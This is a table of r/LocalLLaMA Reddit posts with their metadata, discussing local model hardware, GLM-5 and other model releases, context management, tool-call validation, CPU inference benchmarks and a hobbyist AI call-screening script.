title stringlengths 1 300 | score int64 0 8.54k | selftext stringlengths 0 41.5k | created timestamp[ns]date 2023-04-01 04:30:41 2026-03-04 02:14:14 ⌀ | url stringlengths 0 878 | author stringlengths 3 20 | domain stringlengths 0 82 | edited timestamp[ns]date 1970-01-01 00:00:00 2026-02-19 14:51:53 | gilded int64 0 2 | gildings stringclasses 7 values | id stringlengths 7 7 | locked bool 2 classes | media stringlengths 646 1.8k ⌀ | name stringlengths 10 10 | permalink stringlengths 33 82 | spoiler bool 2 classes | stickied bool 2 classes | thumbnail stringlengths 4 213 ⌀ | ups int64 0 8.54k | preview stringlengths 301 5.01k ⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Best practices for cost-efficient, high-quality context management in long AI chats | 0 | I’m building an AI chat system where users can have long, continuous conversations with different LLM models.
The main challenge is maintaining **high conversation quality** while also keeping **token usage and cost under control** over time.
Since conversations can grow very large, sending the entire history on every request is not practical. At the same time, aggressive summarization can hurt the quality of the interaction.
This becomes even more challenging because different models have:
* different context window sizes
* different tokenization behavior
* different input/output pricing
So a strategy that works well for one model may not be optimal for another.
I’m trying to understand:
**What are the best proven patterns for managing short-term conversation context in production AI chat systems in a way that balances:**
* conversation quality
* cost efficiency
* scalability across many different LLM providers
Specifically:
* How should raw messages vs summaries be balanced?
* How should systems decide how much recent history to include?
* Are there established architectural patterns for this problem?
I’m also very curious how systems like **ChatGPT** and **Claude** approach this internally when conversations become long.
Has this problem been solved in a reusable or well-documented way by any team or open source project? | 2026-02-11T20:23:59 | https://www.reddit.com/r/LocalLLaMA/comments/1r28i3r/best_practices_for_costefficient_highquality/ | Rezadev8 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r28i3r | false | null | t3_1r28i3r | /r/LocalLLaMA/comments/1r28i3r/best_practices_for_costefficient_highquality/ | false | false | self | 0 | null |
GLM 5!!!!!! | 0 | It's out!!!! Super excited!!!!!
Will it be as good as Claude?
How would it compete with the upcoming DSV4?
What do u guys think? Personally, I think Open Source won. Hyped!
[https://huggingface.co/zai-org/GLM-5](https://huggingface.co/zai-org/GLM-5)
https://preview.redd.it/o8c2606yaxig1.png?width=3640&format=png&auto=webp&s=74ee21d37145e6f0983f084ead43bb8e8aa41a01
| 2026-02-11T20:14:51 | https://www.reddit.com/r/LocalLLaMA/comments/1r2898u/glm_5/ | Sicarius_The_First | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r2898u | false | null | t3_1r2898u | /r/LocalLLaMA/comments/1r2898u/glm_5/ | false | false | 0 | null | |
How common is it to validate LLM output before passing it to tool execution? | 3 | Genuinely curious about this because I see very different approaches in the wild.
If you're building agents that have tool use, like the LLM can write files, run SQL queries, execute code, call APIs, whatever. What does the path between "LLM generates a response" and "tool actually executes" look like for you?
do you do any schema validation on the LLM's tool call output before executing it? like checking the SQL is read-only, or the file path is within an allowed directory? Or does the raw LLM output basically go straight into the tool with maybe some json parsing? If you do validate, is it hand-rolled checks or something more structured?
Not talking about prompt engineering to prevent bad outputs, talking about actual code-level validation between the LLM response and the dangerous operation. Curious what people are actually doing in practice vs what the framework docs recommend. | 2026-02-11T20:14:27 | https://www.reddit.com/r/LocalLLaMA/comments/1r288w3/how_common_is_it_to_validate_llm_output_before/ | felix_westin | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r288w3 | false | null | t3_1r288w3 | /r/LocalLLaMA/comments/1r288w3/how_common_is_it_to_validate_llm_output_before/ | false | false | self | 3 | null |
Approximate release of MiniMax M2.5 for coding | 0 | MiniMax just release their M2.5 model however it has not been release for coding yet, when we are expecting for coding? Does existing coding plan with M2.1 is going to get access to M2.5 ? | 2026-02-11T20:01:06 | https://www.reddit.com/r/LocalLLaMA/comments/1r27w2d/approximate_release_of_minimax_m25_for_coding/ | East-Stranger8599 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27w2d | false | null | t3_1r27w2d | /r/LocalLLaMA/comments/1r27w2d/approximate_release_of_minimax_m25_for_coding/ | false | false | self | 0 | null |
Expected cost for cpu-based local rig? | 2 | Trying to figure out a realistic budget for a local rig. I’m thinking it will cost \~$2500 for 2x epyc 7302, 500gb ddr4 ram, and h11dsi mobo. I have a couple 5060ti 16gb, and a 1200w PSU. Buying tons of VRAM is outside of my budget, but I still want to be able to run the most intelligent SOTA models if possible, thus the RAM capacity at 8-channel.
Is this a ridiculous and impractical build? | 2026-02-11T19:58:31 | https://www.reddit.com/r/LocalLLaMA/comments/1r27tgl/expected_cost_for_cpubased_local_rig/ | Diligent-Culture-432 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27tgl | false | null | t3_1r27tgl | /r/LocalLLaMA/comments/1r27tgl/expected_cost_for_cpubased_local_rig/ | false | false | self | 2 | null |
GLM-5 vs Opus 4.6 | 49 | Not sure why Z.ai didn't do this comparison themselves. GLM-5 still looks to be a very good model. | 2026-02-11T19:58:27 | jd_3d | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r27te5 | false | null | t3_1r27te5 | /r/LocalLLaMA/comments/1r27te5/glm5_vs_opus_46/ | false | false | 49 | {'enabled': True, 'images': [{'id': '8exs88to7xig1', 'resolutions': [{'height': 119, 'url': 'https://preview.redd.it/8exs88to7xig1.png?width=108&crop=smart&auto=webp&s=099b97db9114f53181af1cab949f16905aa7520b', 'width': 108}, {'height': 239, 'url': 'https://preview.redd.it/8exs88to7xig1.png?width=216&crop=smart&auto=webp&s=2ecf6373fda99c30c29e5cdb68fe9ceae7a72688', 'width': 216}, {'height': 354, 'url': 'https://preview.redd.it/8exs88to7xig1.png?width=320&crop=smart&auto=webp&s=34e7ef1cb177485ee67a6225d200b351a8bb73ab', 'width': 320}, {'height': 709, 'url': 'https://preview.redd.it/8exs88to7xig1.png?width=640&crop=smart&auto=webp&s=eab22e9d81dacfc8bedd008dcdb852b872e38938', 'width': 640}], 'source': {'height': 775, 'url': 'https://preview.redd.it/8exs88to7xig1.png?auto=webp&s=a8483255f4072b1d7b7fffe083341e0ae2523e05', 'width': 699}, 'variants': {}}]} | ||
problem with gemini 3 pro image preview lmarena | 0 | is it just me or the lmarena gemini 3 pro image preview doesn't work most of the time like i told it to make me a graph it just gave me an error and i tried so many times with so many different prompts it just gives me an error "Something went wrong with this response, please try again" and can someone please tell me why, not only gemini 3 but even gemini 2.5 flash and 2.0 | 2026-02-11T19:53:44 | https://www.reddit.com/r/LocalLLaMA/comments/1r27ort/problem_with_gemini_3_pro_image_preview_lmarena/ | HACKER_num1 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27ort | false | null | t3_1r27ort | /r/LocalLLaMA/comments/1r27ort/problem_with_gemini_3_pro_image_preview_lmarena/ | false | false | self | 0 | null |
Future GLM 5 variants | 12 | GLM-5 is amazing! I really wish GLM releases future Air and Flash variants using the same architecture and use direct distillation with the same expert count (yes, ultra-sparse models are very smart,been proven w Qwen3-Next,and mimicking everything EXCEPT the parameters count makes distillation much more accurate) something like GLM-5-Air around 110-120B QATed to MXFP4 and GLM-5-Flash using the same strategy and same DSA would easily beat any models of the size currently. | 2026-02-11T19:49:43 | https://www.reddit.com/r/LocalLLaMA/comments/1r27ktj/future_glm_5_variants/ | perfect-finetune | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27ktj | false | null | t3_1r27ktj | /r/LocalLLaMA/comments/1r27ktj/future_glm_5_variants/ | false | false | self | 12 | null |
Electrical Engineering Student Building Local AI Assistant | 1 | I’m attempting to build a local, 24/7 AI assistant as a personal learning project. I did some testing with TinyLLaMA Q4\_K\_M GGUF and created a wrapper for agentic tool calling, but struggled to get the AI to reliably call tools. Based on the research I've done so far, I think a multi-model system with a small AI router to determine which specialized AI is used would best suit my needs.
My Goals:
1. Fully private and local
2. Agentic Capabilities
3. Physical screen access and remote access via discord
4. Monitor sensors and project management (like running and working on them)
5. Keep track of my schedule and deadlines (probably via google calendar)
6. Scalable for new tools and projects
What I have:
1. The only device I currently have that could run an LLM is my Omen Max 16 (16gb) laptop that I use for work/school (not suitable for long-term deployment)
2. Raspberry Pi 3 (1gb ram), Arduino Uno R3 with full starter kit, and a 3D Printer
My questions:
1. Since I want to have it running 24/7, what kind of setup should I be looking for on a student budget?
2. Could I use the Pi 3 for this project? Or should I use it for something else
3. What framework and AI models are best for a beginner like me to implement modular tool-calling?
Any advice is appreciated! I'm also looking for any resources I can look into and use to learn more :) | 2026-02-11T19:48:37 | https://www.reddit.com/r/LocalLLaMA/comments/1r27jp0/electrical_engineering_student_building_local_ai/ | TheDarkGodVecta | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27jp0 | false | null | t3_1r27jp0 | /r/LocalLLaMA/comments/1r27jp0/electrical_engineering_student_building_local_ai/ | false | false | self | 1 | null |
Advice on current models and direction for hardware improvements | 0 | Got myself the following setup:
RTX 5090 32GB VRAM
128GB DDR4
Ryzen 9 5950x
Msi Meg x570 Unify
1200W PSU
What models would be recommended for this type of system? I did some research for gemma 3 27b which presumably is still top tier for consumer setup like this but many places say I could even run quantitizied 70b models on single RTX 5090?
I do coding projects and some writing which I'd like to ponder locally with reasonable context.
The reason I ask for help and not just testing all the models is that currently my internet is on mobile hotspot and takes ages to load bigger models.
Also what would you suggest for further development of the hardware?
PSU ofc. But would a threadripper DDR4 platform (retaining the RAM modules) make sense for multi GPU of additional 3090's, or would a second 5090 suffice on current mobo setup? Figured with the current RAM prices I'd go for the 5 year end game with the DDR4 platform. | 2026-02-11T19:46:21 | LeRattus | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r27hgm | false | null | t3_1r27hgm | /r/LocalLLaMA/comments/1r27hgm/advice_on_current_models_and_direction_for/ | false | false | 0 | {'enabled': True, 'images': [{'id': '0ibgu2326xig1', 'resolutions': [{'height': 110, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?width=108&crop=smart&auto=webp&s=0f79741e59a127cb1415a40094ecbfda408986c8', 'width': 108}, {'height': 220, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?width=216&crop=smart&auto=webp&s=d55afd709972feea38c27fe49f4d005669a0d1c7', 'width': 216}, {'height': 327, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?width=320&crop=smart&auto=webp&s=584f8d72cf01f4e09b6dddbf5d41e5024f5b7da8', 'width': 320}, {'height': 654, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?width=640&crop=smart&auto=webp&s=070458418043f4d6c7a8277b6da31d0b7d9f3cc7', 'width': 640}, {'height': 981, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?width=960&crop=smart&auto=webp&s=66640d706b49ad6ee466441fec344e16d4f45349', 'width': 960}, {'height': 1104, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?width=1080&crop=smart&auto=webp&s=36356b7609644a0a4703ee1480a8f9d03a4b3c2a', 'width': 1080}], 'source': {'height': 3233, 'url': 'https://preview.redd.it/0ibgu2326xig1.jpeg?auto=webp&s=f1fe0f186c4ac24fdaf9c9cbf7d8a666d1e1ca21', 'width': 3162}, 'variants': {}}]} | ||
1TB open weight Kimi 2.5 first impressions | 10 | I signed up for kimi cloud account and I got one month free. I used the Kimi CLI. I ran a code review against an android weather widget that hadn't been code reviewed before by an agent. It did very well it my opinion. I would say it was 90% as good as claude 4.6. Only hiccuped in one place where I thought Opus would have succeeded.
Since I suspect it is many times cheaper than Opus, I'll likely switch to this one when my Opus plan expires in 18 days. Unless GLM 5 is better. haha, good times. | 2026-02-11T19:43:05 | https://www.reddit.com/r/LocalLLaMA/comments/1r27ecr/1tb_open_weight_kimi_25_first_impressions/ | Terminator857 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27ecr | false | null | t3_1r27ecr | /r/LocalLLaMA/comments/1r27ecr/1tb_open_weight_kimi_25_first_impressions/ | false | false | self | 10 | null |
Who needs a GPU? Deep Dive into CPU-Only LLM Inference Speeds | 1 | Hi everyone,
I’ve been experimenting with pushing **CPU-only inference** to its limits on a consumer-level setup. I wanted to share the generation speeds I’ve achieved by focusing on high-speed memory bandwidth rather than a dedicated GPU.
# The Hardware (The CPU-Only Setup)
The goal here was to see how an Intel i7-14700F performs when paired with tuned DDR5.
* **CPU:** Intel i7-14700F (Testing focused on P-cores)
* **RAM:** 96GB (2x48GB) DDR5 @ 6600 MT/s (Timings: 32-39-39-48)
* **Measured Bandwidth:** \~102.3 GB/s
* **Latency:** 48.0 ns
# Test Methodology
To ensure these were pure CPU tests, I disabled CUDA and isolated the cores using the following `llama-bench` command:
`CUDA_VISIBLE_DEVICES="" taskset -c 0-15 llama-bench -m <MODEL> -fa -mmap -t 16 -p 512 -n 512 -r 5 -o md`
# The Results
|**Model**|**Size**|**Params**|**Test**|**Tokens/Sec**|
|:-|:-|:-|:-|:-|
|**gpt-oss 20B** (Q4\_K\_M)|10.81 GiB|20.91 B|tg512|**33.32**|
|**GLM-4.7-Flash** (Q4\_K\_M)|17.05 GiB|29.94 B|tg512|**24.10**|
|**gpt-oss 20B** (F16)|12.83 GiB|20.91 B|tg512|**22.87**|
|**GLM-4.7-Flash** (Q8\_0)|32.70 GiB|29.94 B|tg512|**15.98**|
|**gpt-oss 120B** (F16)|60.87 GiB|116.83 B|tg512|**16.59**|
|**GLM-4.7-Flash** (BF16)|55.79 GiB|29.94 B|tg512|**11.45**|
|**Qwen3 Next Coder** (Q4\_K\_M)|45.17 GiB|79.67 B|tg512|**11.50**|
|**Gemma3 12B** (Q4\_K\_M)|6.79 GiB|11.77 B|tg512|**11.23**|
|**Qwen3 Next Coder** (Q8\_0)|86.94 GiB|79.67 B|tg512|**9.14**|
# Observations
The 102 GB/s bandwidth really makes a difference here. Getting **16.59 t/s on a 120B parameter model** using only the CPU is better than I expected for a non-server chip.
* **How are your CPU-only speeds looking?**
* **Any suggestions for** `taskset` **tweaks?** I'm currently using 16 threads to stay on the P-cores, but I'm curious if anyone has seen better results with different core affinities.
Looking forward to your feedback! | 2026-02-11T19:41:05 | https://www.reddit.com/r/LocalLLaMA/comments/1r27cch/who_needs_a_gpu_deep_dive_into_cpuonly_llm/ | Shoddy_Bed3240 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r27cch | false | null | t3_1r27cch | /r/LocalLLaMA/comments/1r27cch/who_needs_a_gpu_deep_dive_into_cpuonly_llm/ | false | false | self | 1 | null |
Looking for advice: How could I reproduce something like GPT‑4o offline? | 0 | I’ve been working closely with GPT‑4o for months, and the way it responded, reasoned, and collaborated with me made it more than just a tool — it was a creative partner.
With its removal approaching, I’m seriously considering building an offline replica or local system that captures at least part of what GPT‑4o offered:
– The responsiveness
– The emotional and contextual memory
– The ability to understand abstract and philosophical ideas
– And above all: the *feel* of deep, fluid conversation
I’m not expecting a 1:1 clone, but I’d love input from others who’ve experimented with local LLMs, fine-tuning, prompt engineering, or memory simulation.
**What hardware would you recommend?**
**Which model might come closest in tone or capability?**
**How could I preserve the “presence” that GPT‑4o had?**
Any tips, architectures, or even wild ideas are welcome.
This is not just about computing — it's about continuity. | 2026-02-11T19:30:36 | https://www.reddit.com/r/LocalLLaMA/comments/1r2724e/looking_for_advice_how_could_i_reproduce/ | Brilliant-Bowler592 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r2724e | false | null | t3_1r2724e | /r/LocalLLaMA/comments/1r2724e/looking_for_advice_how_could_i_reproduce/ | false | false | self | 0 | null |
Z.ai said they are GPU starved, openly. | 1,426 | 2026-02-11T19:28:16 | abdouhlili | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r26zsg | false | null | t3_1r26zsg | /r/LocalLLaMA/comments/1r26zsg/zai_said_they_are_gpu_starved_openly/ | false | false | 1,426 | {'enabled': True, 'images': [{'id': 'kjy1wqzt2xig1', 'resolutions': [{'height': 86, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?width=108&crop=smart&auto=webp&s=540b733efc5ed5fb9fd175eee93714f91f8db51a', 'width': 108}, {'height': 173, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?width=216&crop=smart&auto=webp&s=10f655936362532771c0933c085511e5d5a87e4c', 'width': 216}, {'height': 257, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?width=320&crop=smart&auto=webp&s=a5865a646c29ba374268190e9694d0e9433cac7c', 'width': 320}, {'height': 514, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?width=640&crop=smart&auto=webp&s=e573128364215e6c6e3a97ac576d0f84213ac948', 'width': 640}, {'height': 771, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?width=960&crop=smart&auto=webp&s=9e5e8b3d761575793eb5be02b6a57cdd42838eb7', 'width': 960}, {'height': 867, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?width=1080&crop=smart&auto=webp&s=5bd92f67da7ba652d5ea127ebf67fc3f043b91e5', 'width': 1080}], 'source': {'height': 969, 'url': 'https://preview.redd.it/kjy1wqzt2xig1.jpeg?auto=webp&s=c6b195d6536433a76b089a4564b0e8eba8654b55', 'width': 1206}, 'variants': {}}]} | |||
Concurrently trained recurrent LLMs outperform much large models. New paradigm? | 3 | The intuition is one we've all had, models might be better if they could reason in latent space. Training that architecture is tricky, but ByteDance looks like they've figured it out with great results.
Paper: https://arxiv.org/abs/2510.25741
Video: https://youtu.be/pDsTcrRVNc0
Homepage (models, code, overview): https://ouro-llm.github.io/
| 2026-02-11T19:27:25 | https://www.reddit.com/r/LocalLLaMA/comments/1r26yyv/concurrently_trained_recurrent_llms_outperform/ | Kooshi_Govno | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r26yyv | false | null | t3_1r26yyv | /r/LocalLLaMA/comments/1r26yyv/concurrently_trained_recurrent_llms_outperform/ | false | false | self | 3 | null |
Real world examples of work on 30-100b models | 6 | hello. just procured hardware for running local inference. 3 x 3090, threadripper, 64gb ddr4. i see a lot of opinions on some of the models that are feasible to run on \~4K of hardware, but very few of them give detailed examples of the work that succeeded or failed for them with these models. some people drag or glaze models like glm 4.7 flash, qwen 3 coder 30b, nemotron 30b, gpt oss 120b, qwen coder next 80b, and I’m aware there are a lot of variables that affect the quality of the output, but no one ever really explains in any meaningful detail what work they have actually experienced the models failing at or performing well with. I also understand people want to keep their personal benchmarks private, but it’s very hard not to get mixed signals when everyone is just like “trust me bro”.
give me some of your war stories with models in these classes, the model in question and the crazy shit it did or something it miserably failed at, particularly coding related and agentic stuff but I’d like to hear some real world experience regardless. The more detail and demonstration the better.
for me, most of the work I do these days is http backend in go, and my project makes heavy use of Libp2p for its functionality and bubbletea for cli, so if anyone has experiences adjacent to this tech, that would be especially valuable. For my actual job it’s a lot of one off python scripts that interface with raspberry pi hardware and some enterprise software database access ask, so models that can one shot those would save me a lot of time too. I also find myself having to diagnose issues with haas mills, so general knowledge is also a plus. | 2026-02-11T19:26:54 | https://www.reddit.com/r/LocalLLaMA/comments/1r26ygu/real_world_examples_of_work_on_30100b_models/ | competitivepissdrnkr | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r26ygu | false | null | t3_1r26ygu | /r/LocalLLaMA/comments/1r26ygu/real_world_examples_of_work_on_30100b_models/ | false | false | self | 6 | null |
Using LLM with Python agentic | 0 | I'm a python developer.
\# I have few questions about local free-LLMs:
1. I've understood the best free & easier way to start with LLM agentic programming (without claude code premium or copilot which is integrated outside the code) is to use \`Ollama\`, Seems like the "crowd" really like it for simple and local and secure solution, and lightweight solution, Am i right?
2. seems like there are some other lLMs just like:
Easiest: Ollama, LM Studio
Most performant: vLLM, llama.cpp (direct)
Most secure: Running llama.cpp directly (no server, no network port)
Most control: HuggingFace Transformers (Python library, full access)
3. There is a reason that they're called \`llama\` and \`Ollama\` and this reddit forum called \`r/LocalLLaMA\`? this reptitive \`lama\` makes me thinks that \`Ollama\` and \`r/LocalLLaMA\` and \`llama.cpp\` are the same, because of the reptitive of the \`lama\` token, Lol...
4. So as first integration with my code (in the code itself) please suggest me the best free solution for secure & easy to implement, Right now i can see that \`Ollama\` is the best option.
Thanks guys! | 2026-02-11T19:21:08 | https://www.reddit.com/r/LocalLLaMA/comments/1r26su5/using_llm_with_python_agentic/ | PapayaStyle | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r26su5 | false | null | t3_1r26su5 | /r/LocalLLaMA/comments/1r26su5/using_llm_with_python_agentic/ | false | false | self | 0 | null |
This LLM app idea is an example of the low-hanging fruit that is available | 1 | I'm super frustrated that my job and other commitments I have don't give me the mental bandwidth to knock out stuff like this, so I'm posting it here in case someone wants to take a stab at it.
I closed on a mortgage recently, which means the credit agencies sold the mortgage application info they have access to to the most evil phone spam bastards on the planet. I'm getting literally dozens of calls a day from all of the states listed on my mortgage application (California, Washington, Montana, and Arizona).
So I thought: I’m tired of "Number Verified" on my caller ID being functionally worthless since scammers just spin up valid VoIP numbers that pass STIR/SHAKEN, making the "verified" badge a joke.
I’m thinking about DIY-ing a personal screening agent to handle the calls that "Silence Unknown Callers" usually just kills (recruiters, tradespeople, the kid's school, etc.).
**The Idea:**
1. **Trigger:** Conditional Call Forwarding via Twilio to a local server.
2. **The "Latency Hack":** The very first thing the caller hears is a canned: *"I am an AI assistant screening this line. I'll be a little slow in verifying you, but hang tight while I process!"*
3. **The Brain:** A local LLM (maybe **Llama 3 8B** or **Mistral** via Ollama or vLLM) running on my home lab or a cheap EC2/Lambda instance.
4. **The Output:** Live transcript pushed to me via Slack/Pushover. If it’s the school or my bank, I call back. If it’s a "limited time offer," the AI hangs up.
**The Question:**
Has anyone here successfully chained Deepgram (STT) -> Groq or local inference -> Cartesia/ElevenLabs (TTS) for a real-time phone bridge?
The "Verified" checkmark is dead. Is "Verification-as-a-Service" via local LLMs the only way forward for those of us who actually need to answer our phones for work/life?
Code I was too lazy to write so I asked Gemini for for a proof of concept based on my specs:
python
from flask import Flask, request
from twilio.twiml.voice_response import VoiceResponse
from openai import OpenAI
app = Flask(__name__)
client = OpenAI(api_key="YOUR_OPENAI_API_KEY")
.route("/voice", methods=['POST'])
def voice():
response = VoiceResponse()
# 1. Immediate "Canned" response to solve latency & legal consent
response.say("I am an AI assistant screening this line to prevent spam. "
"Please state your name and the reason for your call while I verify you.")
# 2. Record the caller's response
response.record(max_length=10, action="/process_speech", transcribe=True)
return str(response)
u/app.route("/process_speech", methods=['POST'])
def process_speech():
transcript = request.form.get('TranscriptionText', '')
response = VoiceResponse()
# 3. Simple LLM logic to categorize the caller
# Using a fast model (GPT-3.5 or GPT-4o-mini) for speed
completion = client.chat.completions.create(
model="gpt-4o-mini",
messages=[
{"role": "system", "content": "You are a call screener. Classify this transcript as 'SCAM' or 'IMPORTANT'. "
"Important calls include schools, banks, recruiters, or tradespeople."},
{"role": "user", "content": transcript}
]
)
decision = completion.choices[0].message.content
if "IMPORTANT" in decision.upper():
response.say("Thank you. I am alerting my owner now. Please stay on the line or expect a call back shortly.")
# TRIGGER PUSH NOTIFICATION HERE (e.g., via Pushover or Slack API)
else:
response.say("This number does not accept unsolicited calls. Goodbye.")
response.hangup()
return str(response)
if __name__ == "__main__":
app.run(port=5000) | 2026-02-11T19:05:26 | https://www.reddit.com/r/LocalLLaMA/comments/1r26des/this_llm_app_idea_is_an_example_of_the_lowhanging/ | robkkni | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r26des | false | null | t3_1r26des | /r/LocalLLaMA/comments/1r26des/this_llm_app_idea_is_an_example_of_the_lowhanging/ | false | false | self | 1 | null |
$3M in grants for open benchmarks advancing agentic AI—applications now open | 1 | [removed] | 2026-02-11T19:05:22 | https://www.reddit.com/r/LocalLLaMA/comments/1r26dd7/3m_in_grants_for_open_benchmarks_advancing/ | vincentsc | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r26dd7 | false | null | t3_1r26dd7 | /r/LocalLLaMA/comments/1r26dd7/3m_in_grants_for_open_benchmarks_advancing/ | false | false | self | 1 | {'enabled': False, 'images': [{'id': 'cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew', 'resolutions': [{'height': 60, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?width=108&crop=smart&auto=webp&s=52d64302a617bdb8caba400c080561af4c379913', 'width': 108}, {'height': 121, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?width=216&crop=smart&auto=webp&s=4a782b6eab039a926c837279080ed62aa346a1be', 'width': 216}, {'height': 180, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?width=320&crop=smart&auto=webp&s=5b45db847207a94d29b49bddb700df2629c73fcc', 'width': 320}, {'height': 360, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?width=640&crop=smart&auto=webp&s=dd8c44c40d7a070344fe9010d1085d1154f9a662', 'width': 640}, {'height': 540, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?width=960&crop=smart&auto=webp&s=b53acad3cd51142642913616923b15038c149902', 'width': 960}, {'height': 607, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?width=1080&crop=smart&auto=webp&s=a620fd8faef0711eea0fd13cd5a9749ee54d49c2', 'width': 1080}], 'source': {'height': 1440, 'url': 'https://external-preview.redd.it/cj-1GMAyRA6k4zidOBC7X94mwv5xF1uWdQuk9Wa-Dew.png?auto=webp&s=fea472cd16ba5c31dd3b9aaec3863d101871989d', 'width': 2560}, 'variants': {}}]} |
We need a sticky of some sort to clean up this subreddit | 1 | [removed] | 2026-02-11T19:05:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r26czj/we_need_a_sticky_of_some_sort_to_clean_up_this/ | see_spot_ruminate | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r26czj | false | null | t3_1r26czj | /r/LocalLLaMA/comments/1r26czj/we_need_a_sticky_of_some_sort_to_clean_up_this/ | false | false | self | 1 | null |
GLM 5 vs Claude Opus 4.6 vs GPT-5.2 — I Asked a Simple Trick Question. GLM 5 Is Similarly Smart as Claude Opus 4.6 | 32 | The question is: "I want to go get my car washed. The car wash is 50 meters from my house. Do you think I should drive there or walk?"
* GLM 5: Drive
* Claude Opus 4.6: Drive
* GPT-5.2: Walk
GLM 5 Is Similarly Smart as Claude Opus 4.6 | 2026-02-11T18:49:40 | Top-Cardiologist1011 | i.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r25xfq | false | null | t3_1r25xfq | /r/LocalLLaMA/comments/1r25xfq/glm_5_vs_claude_opus_46_vs_gpt52_i_asked_a_simple/ | false | false | default | 32 | {'enabled': True, 'images': [{'id': '3h8lyy7vvwig1', 'resolutions': [{'height': 60, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?width=108&crop=smart&auto=webp&s=8c072afc7bb05e1687a48e2970521a0dbea31afa', 'width': 108}, {'height': 121, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?width=216&crop=smart&auto=webp&s=d1814719ed611b87f349983611b6900ef54b50a9', 'width': 216}, {'height': 180, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?width=320&crop=smart&auto=webp&s=a3b079e74f74117a2fea0b40d60b6583713d8b0c', 'width': 320}, {'height': 360, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?width=640&crop=smart&auto=webp&s=aabbee1659ec3fbe4da01dd624c78c53aa87f7ec', 'width': 640}, {'height': 540, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?width=960&crop=smart&auto=webp&s=3ab429c0c949234c0d0349ebc99fbe745e4a9f33', 'width': 960}, {'height': 607, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?width=1080&crop=smart&auto=webp&s=588d8744313ce0e78ac8411c143f1ecba10c54a9', 'width': 1080}], 'source': {'height': 2160, 'url': 'https://preview.redd.it/3h8lyy7vvwig1.png?auto=webp&s=f4ed7b5700e9c954185ca27c0d29d2f820238825', 'width': 3840}, 'variants': {}}]} | |
GLM 5 vs Claude Opus 4.6 vs GPT-5.2 — I asked a simple trick question. only one got It right. | 4 | The Question is "I want to go get my car washed. The car wash is 50 meters from my house. Do you think I should drive there or walk?"
GLM 5: Drive
Claude Opus 4.6: Walk
GPT-5.2: Walk
